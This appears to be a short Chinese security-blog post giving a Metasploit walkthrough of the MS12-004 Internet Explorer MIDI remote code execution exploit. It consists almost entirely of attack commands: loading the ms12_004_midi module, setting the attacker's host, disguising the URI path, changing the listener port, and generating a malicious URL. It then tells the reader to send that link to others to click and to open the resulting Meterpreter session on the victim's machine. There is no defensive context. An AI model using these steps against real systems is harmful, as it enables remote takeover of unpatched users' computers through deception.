Metasploit之MIDI文件解析远程代码执行

颓废 2019年5月19日10:11:16评论739 views字数 709阅读2分21秒阅读模式

Metasploit之MIDI文件解析远程代码执行

本次漏洞利用的是ms12-004的IE漏洞

metasploit下进行操作

search 12-004            -->搜索漏洞相关模块,得到exploit/windows/browser/ms12_004_midi

use exploit/windows/browser/ms12_004_midi        -->使用这个漏洞模块

show options                     -->查看设置选项

set SRVHOST 192.168.2.146        -->设置我们本机攻击者的IP

exploit    -->生成exploit,得到http://192.168.2.146:8080/piu8OT,这个地址比较敏感,易被发现

set URIPATH /         -->设置exploit的目录地址伪装

exploit               -->再次生成exploit,这里会发现我们的原本默认端口4444可能会被占用

set LPORT 5555        -->改用5555端口监听 

exploit               -->最后一步生成exploit,地址:http://192.168.2.146:8080/

发送地址让别人去点击访问:http://192.168.2.146:8080/

我们的msf会得到一个会话,显示Successfully migrated to process我们就回车即可

然后查看我们的会话,并且打开开始利用相关命令进行shell渗透

sessions          -->查看我们的会话

sessions -i id    -->使用我们的会话,其中“id”为我们需要的会话数字ID

这样即可获得meterpreter

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:11:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit之MIDI文件解析远程代码执行http://cn-sec.com/archives/67377.html

发表评论

匿名网友 填写信息